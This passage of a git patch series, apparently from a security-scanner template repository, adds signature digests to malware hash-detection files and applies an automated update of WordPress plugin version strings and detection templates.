4b0a00483046022100c8f11fadc36b3416cc0ef3a9befdd2ac335f070d9efaa19aa84c4d8f966268a7022100b692fc6cdee671850192ca8759d3beb03771d1b6d19dfa95819808359bf0521f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/turla-malware-hash.yaml b/file/malware/hash/turla-malware-hash.yaml index 4ec1736272..04249adb3f 100644 --- a/file/malware/hash/turla-malware-hash.yaml +++ b/file/malware/hash/turla-malware-hash.yaml @@ -26,4 +26,5 @@ file: - "sha256(raw) == '8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98'" - "sha256(raw) == '0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f'" - "sha256(raw) == '2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2'" - condition: or \ No newline at end of file + condition: or +# digest: 490a0046304402202a529af4e2c672912e07f47775f1a5faf0eeddaef1d1cd5f358e5870e6a47e1a02207b628b9451d23034e702188e2448407d52e61d6dd0479a15ab4a2439036ba509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/unit78020-malware-hash.yaml b/file/malware/hash/unit78020-malware-hash.yaml index 2eca3c4596..ffc3c3efb0 100644 --- a/file/malware/hash/unit78020-malware-hash.yaml +++ b/file/malware/hash/unit78020-malware-hash.yaml @@ -24,3 +24,4 @@ file: - "sha256(raw) == '7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af'" - "sha256(raw) == '88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790'" condition: or +# digest: 4a0a00473045022100dc54d186a602d92d8a61784d00509d7e29d56e847841f083ee3b69ea346aeb8402203be2261ebe0752c89b61e478caf3e2e164640ef94c04d68514a68d7b95f1e17c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/wildneutron-malware-hash.yaml b/file/malware/hash/wildneutron-malware-hash.yaml index 3fa705a81e..be1cb4f42c 100644 --- a/file/malware/hash/wildneutron-malware-hash.yaml +++ b/file/malware/hash/wildneutron-malware-hash.yaml @@ -28,4 +28,5 @@ file: - "sha256(raw) == '683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9'" - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" - "sha256(raw) == '8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a'" - condition: or \ No newline at end of file + condition: or +# digest: 490a004630440220086e06317df4bddc8a0d06db3e3d425ce85e8d8b171fdb6c9fd57b727f426eb8022020c41ddbc32b5418dae8ddd213da4b5e5699812fb90290e95cd62fb3f7224173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cb3f401a25adc444144b13adc6e4c324a3ccc40c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 22 Jun 2024 00:19:18 +0000 Subject: [PATCH 0504/1841] Auto WordPress Plugins Update [Sat Jun 22 00:19:18 UTC 2024] :robot: --- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/limit-login-attempts-reloaded.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- helpers/wordpress/plugins/really-simple-ssl.txt | 2 +- helpers/wordpress/plugins/wp-optimize.txt | 2 +- helpers/wordpress/plugins/wps-hide-login.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 206 files changed, 6 insertions(+), 206 deletions(-) diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index cbccdeb8a1..0a0a9272fb 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.2.42 \ No newline at end of file +3.2.45 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index 196e7f8906..f84dfd3710 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.26.10 \ No newline at end of file +2.26.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index 0da2d29f25..9da0a092a0 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -8.3.9 \ No newline at end of file +8.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt index 001bf16406..daf8e4cb8c 100644 --- a/helpers/wordpress/plugins/really-simple-ssl.txt +++ b/helpers/wordpress/plugins/really-simple-ssl.txt @@ -1 +1 @@ -8.1.4 \ No newline at end of file +8.1.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-optimize.txt b/helpers/wordpress/plugins/wp-optimize.txt index 5436ea06e3..fbcbf73806 100644 --- a/helpers/wordpress/plugins/wp-optimize.txt +++ b/helpers/wordpress/plugins/wp-optimize.txt @@ -1 +1 @@ -3.3.2 \ No newline at end of file +3.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wps-hide-login.txt b/helpers/wordpress/plugins/wps-hide-login.txt index f868675320..a8729d775f 100644 --- a/helpers/wordpress/plugins/wps-hide-login.txt +++ b/helpers/wordpress/plugins/wps-hide-login.txt @@ -1 +1 @@ -1.9.16.3 \ No newline at end of file +1.9.16.4 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index dae7c3402e..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fab095418e33039b29c51a8920a1fe18e6d0e7408e243a815952c1ea5733e8b1022100ab043f76f1c92624a7737398435a2795d0dc798d57f96594caf081dc66b99fc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index a45446e8de..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210092bbc6df1aa8bb3753f0cdcd0045eec9519a9806aa79dc64ca729d4d962842ca022100b0ce1682719eb1cf61a57d409a28f8c913fb241967d4ab3a21c6acbe89c4707e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index c1435d606a..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f00cdfa3e92fac3e6df768b889b225fe4d2eef247a6daa3ca454f3f63c0c287402201c5be29df00a6b4e2754483327399996de3f8ac50d42ea0d926d6bc97f09c1d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 962af57e49..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009ecdab7cd67490f71a9c1506be830526f75c764a0421d003e5b2b1512f65a7500220523d4d8bcd7ba7c359d5ec26c9b360f3164832ce0c22685b55daf7be5a64bfbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 9e84cd0d21..f68ad2a6bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201fee8dbf6fb051d90168b67b11cf2f7b29e99daa1b8bd9dc430da0a54ad4e48c022100f7634118574b37ed920a8b20d26dabe75abcb292a9c2ecb67571985084252add:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 3e15b67a23..196cc7e8e8 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022004f37cec0078ae3caa678f9a91939bc0b64be2519e7da4d8488aba2e4ed080ce022100d2a1ccdcce6a1f45c485499a6caad8aeaad8b7680d19cf22be0021b8c3be8c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 110db3c573..55362630df 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e4d15e9f1ccb7be40cb92cf2fbc53752e8b113d675fc1566a90d33d582720e1e022100a0be0d749016f1d31010eeb058c0167e415788ac31c267348e7857760afec5e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index f65f8995a0..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b03e7e224c9d4b4972be36cdeb0e88d01da7c31b6cc7c3185c7be4f293c7407602210096cbac4033f8660856836110163baaf380ba50f9cedc81fdf3d909f23446ffde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index e8d6e3fbd3..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088bfcafb9b6e1fbcfb4b4196d567931c59020f7ac7fad05222aa9fe44234d5d502210081ca7bb1e524186a8777495690573f846300cb85fce5c8a93e0b886ac68b48eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index dca8c6aa69..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220390769ec4dd242409b00b3272ec624c17eef35ebed34db178d4613e83acc3a60022100957a36fe47335d6771fa81d5c093e3dc549a435ef6cef4ef4691f064b6ddba2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 8f84551ce0..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb28e2e366a4d5de79f041902b339a62bc5920388d1a65a6e6d868edf743ef7a022100eba8a5472e918323c1f6bcf5ca19e995f094cb3e95995a0ccdb71e2d7cb22d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 93b471a987..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b19338e1e3b31685e227bf8256fa5a89cfe987ba28a067e24f57c857f504769b022005fba5542bc0a16f049114e36888b769dcb61e526dc464428552473070a9ed12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index b351502a8a..f76b750bf6 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220782594ef892f7ad9c342aae4563116ba176c86d5cd29b22398d4b6277da9060102201aed06be340c98b81757d1b7ab60845a2d42b9f1551f5c490b70bab6407cdf8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 978d302027..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100beaa98ae8702bebfec684e8c9f11f141d882a85359cb2624aa083db96427554002202ec0bfa2253243aade9d3a76bae433a6c3b42249f3d89811e3c9e8c4ea37ff83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 7ae6d10950..d1e01c329b 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aaf14cfd177925c6a89811411bf3aac0fde90c7d0244dfde7fd173ff546f0906022006010472a74ed8b25e16f99496da7802e266a6f873b6b017968003af68f5dbb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index ac17d592b6..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220348e3839e99ef4b0a6fc47de04b9cb4a77aaf54c8cf672d68846c7b78f84ca020221008af216b380bc7c10e58e2a4e7d47c7edd920c2e3fce4ee8c70d7e618ee9090ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 173761b249..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf8b3fd78e18a4a2a71670e207657dc198862336d3f4f20c942385d73135b57e02201918441cfa50a428af78e6ad44632f475eabb8f7a54a92e5022c639771a525e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 822df52638..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220239c74a220ab889e382bf42b34d10048eb1e4daed3127e27f4e43bb9d2098a4102210093784c76693bd3a025f578675ea4f794f876fddea4dd0d678a02e3f7d6d98a47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 6ca6b5e7b8..f3aae5f624 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ce566fe2a44f74fb51c48b47040ee42b8b3dad91074220b7188ee3a25448090022100f74c00a03a0958f9cea6b63c371f52277332326f20b420e0bc32ddf53f61d926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 